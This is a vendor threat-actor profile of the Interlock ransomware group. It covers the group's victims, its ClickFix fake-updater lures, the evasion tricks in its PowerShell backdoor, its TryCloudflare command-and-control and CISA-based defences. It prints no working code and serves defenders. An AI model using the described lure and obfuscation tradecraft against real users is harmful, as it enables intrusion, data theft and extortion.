Threat actor profile: Interlock ransomware

Arctic Wolf examines Interlock’s most common attack methods and provides tips on how to protect your organisation.

---

A relatively new threat group, Interlock, has gained traction in 2025 as an opportunistic ransomware operator. In this press release, Arctic Wolf examines Interlock’s most common attack methods and provides tips on how to protect your organisation.

A relatively new ransomware group, Interlock has gained traction in 2025 as an opportunistic ransomware operator that leverages compromised websites and multi-stage social engineering techniques to deliver its payloads.

First observed in September 2024, Interlock departs from the traditional ransomware-as-a-service (RaaS) model, operating without affiliates or public advertisements. The financially motivated group conducts opportunistic double extortion campaigns, relying on a private infrastructure and a custom leak site – “Worldwide Secrets Blog" – to pressure victims with the threat of publicly exposing sensitive data.

• Interlock is an opportunistic ransomware actor, known for obtaining initial access via compromised websites and social engineering techniques.
• In August 2025, Interlock claimed responsibility for the July 2025 ransomware attack against the City of St Paul, Minnesota.
• Interlock makes frequent use of the “ClickFix” technique, where unwitting targets are sent to compromised websites and asked to “prove they are human” by pressing keys that (unbeknownst to them) cause their device to download malware such as remote access trojans (RATs).
• Interlock carries out double extortion attacks, first exfiltrating then encrypting data. Targets who do not pay the ransom are posted on their leak site, typically with the name of the victim, amount of data stolen, number of files and folders, and a link to the victim’s website (if applicable).

The Interlock ransomware group (also known as Nefarious Mantis) was first observed in September 2024 and has emerged as a high priority threat in recent months. Over the past 11 months, it has targeted businesses and critical infrastructure sectors across North America and Europe, including education, healthcare, technology and government entities. In June 2025, the US Cybersecurity and Infrastructure Security Agency (CISA) and FBI warned of increased Interlock ransomware activity.

The group is financially motivated, and according to the FBI, is opportunistic when selecting targets. Unlike many modern ransomware groups, Interlock does not follow a typical RaaS model and likely operates as a closed group.

Historically, Interlock ransomware has obtained initial access via drive-by downloads from compromised legitimate websites, an infection chain not typically associated with ransomware actors. In May 2025, the group added the ClickFix social engineering technique to its arsenal.

Interlock’s encryption payload is typically deployed across virtual machines, leaving hosts, workstations and physical servers unaffected.

Open source reporting has detailed similarities between the Rhysida and Interlock ransomware variants. CISA’s advisory on Rhysida can be found here. There is evidence to suggest that Interlock may have emerged as a spinoff group from Rhysida, although this has not been definitively proven to date.

On 22 July 2025, CISA and the FBI, in combination with other federal agencies, issued a joint advisory warning that Interlock had recently upgraded its malware, making it more resistant to detection. The advisory cautioned that the FBI had “encountered Interlock ransomware encryptors designed for both Windows and Linux operating systems”, and that these encryptors have been observed encrypting virtual machines (VMs) across both operating systems.

To date, at least 58 known victims have been posted to Interlock’s leak site. The most high impact attack to date was the DaVita breach in April 2025, stealing 1.5 terabytes of data and affecting 200 000+ patients of the kidney dialysis service provider.

On 11 August 2025, Interlock claimed responsibility for the July 2025 ransomware attack on the city of St Paul, Minnesota, which took key city systems offline and put the personal data of 3 500 city employees potentially at risk. Ten days prior to the attack, cyber threat intelligence company PRODAFT claimed it had detected Interlock pre-attack activity in the city’s systems, warning on X (formerly Twitter) that this activity had a “certain likelihood of spreading”. The city has since confirmed the attack was perpetrated by Interlock, but stated it did not pay the ransom demand.

In a recent interview with Fox 9 Minneapolis-St Paul news (KMSP-TV), Arctic Wolf President of Technology and Services, Dan Schiappa, spoke about how the St Paul attack could have occurred.

“Typically, these ransomware groups try and go after infrastructure [because] they get the most ransomware dollars out of that. This is typically something that a hacking group would do reconnaissance on – they understand the value of the data. They would find the weak points in the ecosystem, then once they’ve gathered all that information, they launch the campaign. We have to take these types of attacks very seriously.”

To gain an initial foothold, the Interlock ransomware group utilises the increasingly common trend of combining stealthy, user-initiated infection chains with living-off-the-land (LOTL) techniques. Variations on this technique, including ClickFix and FileFix, typically use legitimate activity to mask malicious behaviour, aiming to evade traditional endpoint detection solutions and network monitoring tools.

One of the reasons why this type of threat activity is so effective is that the malicious instructions are hosted on compromised websites that are often already trusted by victims, making them more likely to follow through on installing the malware when prompted.

Interlock employs deceptive tactics to deliver its initial payloads, most notably via the use of fake software updaters hosted on compromised websites. These are crafted using PyInstaller to mimic legitimate software like Google Chrome or Microsoft Edge.

When a user manually follows the instructions shown on one of these fake update websites, a legitimate installer for Chrome or Edge runs as a decoy, while a malicious PowerShell script is silently run in the background. The script acts as a first-stage backdoor, persistently communicating with command-and-control (C2) servers, gathering detailed system information and enabling follow-on activity.

This is a social engineering technique commonly referred to as ClickFix, which relies on users being tricked by threat actors into running malicious commands, often under the pretext of updating existing software. False dialogue boxes instruct the user to use popular Windows shortcuts such as “Windows + R” (run) then “CTRL + V” (paste) to unwittingly paste and run harmful PowerShell commands, thus circumventing traditional security defences and compromising their own systems.

The use of this ClickFix technique has been observed in several other malware campaigns, including those by Lumma Stealer (aka LummaC2 stealer), AsyncRAT, DanaBot and DarkGate.

Figure 1: ClickFix fake updater dialogue prompts users to manually execute PowerShell command. (Source: Sekoia.io)

---

Once manually executed by victims, the PowerShell backdoor operates stealthily, running in the background by relaunching itself in a detached mode to avoid detection by the user. It continuously polls remote hosts using HTTP requests, with fallback mechanisms between domains and IP addresses.

A significant amount of variation has been observed among the PowerShell commands executed in recent ClickFix social engineering campaigns, often employing techniques to evade detections that rely on string matching. Obfuscation techniques include the use of character codes, plus characters, caret characters and asterisk characters. Most often, these commands make use of built-in download and execution functions like Invoke-RestMethod, Invoke-Expression and their corresponding aliases. Malicious URLs in these commands use malicious domains, legitimate domains used maliciously such as trycloudflare.com, and IPv4 addresses directly.

This collects data such as system information, user privileges, running processes, services and network configuration, which it obfuscates and compresses before exfiltrating to a designated C2 endpoint. The C2 can then issue commands, including delivering executable or DLL payloads, which are decoded and saved locally. Interlock has historically used multiple tools, including Cobalt Strike, Interlock RAT, NodeSnake RAT and SystemBC for C2 communication and command execution.

Figure 2: Example of a malicious PowerShell script, which victims are tricked into executing.

---

Persistence is established in later script versions (up to v11) through Windows registry keys, and the script can receive and execute arbitrary commands from the threat actor.

All known C2 infrastructure used by this backdoor abuses Cloudflare’s “TryCloudflare” tunneling tool, using dynamically generated subdomains to obfuscate traffic and evade traditional detection methods. Developers commonly use TryCloudflare to experiment with Cloudflare Tunnel without adding a site to Cloudflare’s DNS, but it has been used in the past to deliver malware. These dynamic and ephemeral domains appear legitimate and act as temporary proxies, making it more difficult to trace or block malicious communication.

This misuse of trusted platforms highlights a growing trend among more sophisticated actors to blend in with legitimate services, challenging defenders’ ability to distinguish malicious traffic from benign.

Recent observations confirm that Interlock has incorporated a custom PowerShell-based remote access trojan (RAT) into its initial access toolkit, delivered via fake software updaters hosted on compromised websites. The PowerShell RAT operates persistently in detached mode without a visible window, collecting detailed host data and enabling remote command execution and payload delivery.

Figure 3: Interlock’s leak site, “Worldwide Secrets Blog”.

---

Figure 4: On 11 August 2025, the City of Saint Paul was officially listed on Interlock’s leak site.

---

When active campaigns are identified, Arctic Wolf moves quickly to protect its customers. Arctic Wolf Labs has leveraged threat intelligence around Interlock’s activity to implement new detections in the Arctic Wolf Aurora Platform to protect customers.

As Arctic Wolf discovers new information, it will enhance its detections to account for additional IOCs and techniques leveraged by this threat group.

Arctic Wolf is committed to the fight against ransomware, and as such, it is proud to stand alongside the 68 members of the International Counter Ransomware Initiative (CRI), the world’s largest international cyber partnership. As a global leader in security operations, Arctic Wolf’s mission is to help protect governments, businesses and safety-critical institutions of all sizes from cyber threats.

Arctic Wolf is delighted to have been selected to co-chair the CRI’s new Public-Private Sector Advisory Panel, led by Public Safety Canada, which establishes a trusted set of private sector partners for CRI members to rely on when responding to ransomware attacks.

Arctic Wolf looks forward to collaborating with CRI members in combating ransomware by catalysing effective information sharing, building trust through clear expectations and person-to-person collaboration, and developing best practices to navigate practical hurdles to combating ransomware.

Though not the newest ransomware group within the threat landscape, Interlock’s steady rise to prominence over the course of 2025 means that organisations should take heed of CISA’s warnings and implement their mitigation suggestions, which are outlined in Arctic Wolf's 'Recommendations' section below.

The proliferation of the Interlock RAT malware delivered through compromised websites earned the group enough notoriety to warrant a warning from CISA and the FBI in June; the group’s most recent attack on the City of Saint Paul represents a direct escalation of this trend. It indicates the group is becoming confident enough in its activities to go after targets it feels can pay out higher-dollar ransom demands, even if that means endangering vital city infrastructure.

From a defensive standpoint, Arctic Wolf will continue to actively monitor this group for further cyber security threats. Financially driven groups like Interlock value impact and disruption as their main goals, with few qualms in targeting both private and government entities in the hopes of securing a large payout. It’s highly likely the group will continue targeting high-profile organisations for financial gain in the coming months.

While user training to help employees detect the red flags of a social engineering attack is a good place to start mitigating this threat, the reality is that even the most security-conscious user still can – and do – fall victim to these types of attacks.

To provide a good solid baseline of security to guard against the type of attacks perpetuated by opportunistic threat actors like Interlock, the following recommendations from CISA will go a long way in defending your organisation:

• Prevent initial access by implementing domain name system (DNS) filtering and web access firewalls, and training users to spot phishing attempts.
• Blocking tunnelling tools and domains related to services such as TryCloudflare in environments where they are not used for operational purposes.
• Mitigate known vulnerabilities by ensuring operating systems, software and firmware are patched and up to date.
• Segment networks wherever possible to restrict lateral movement from initial infected devices to other devices in the same organisation.
• Implement identity, credential and access management (ICAM) policies across the organisation.
• Have an incident response (IR) plan ready and ensure you have an incident response group that you can reach out to or enable should the need arise.
• Endpoint detection and response (EDR) platforms can uncover hidden red flags of intrusion and can even prevent attackers gaining an initial foothold in the first place. Consider implementing enterprise solutions such as Arctic Wolf Aurora Endpoint Defense.
• Require multi-factor authentication (MFA) for all services, particularly for webmail, VPN and accounts that access critical systems.
• Check out Arctic Wolf's recommendations on how to defend your organisation against Interlock’s FileFix delivery method in the company's latest blog.

A complimentary ITWeb webinar will be brought to you in partnership with Arctic Wolf on 9 September 2025 | Online.

Join Arctic Wolf to discover how a managed, AI-powered endpoint solution can cut through the noise, stop advanced threats before they spread and keep your business safe, today and into the future. 

Click here.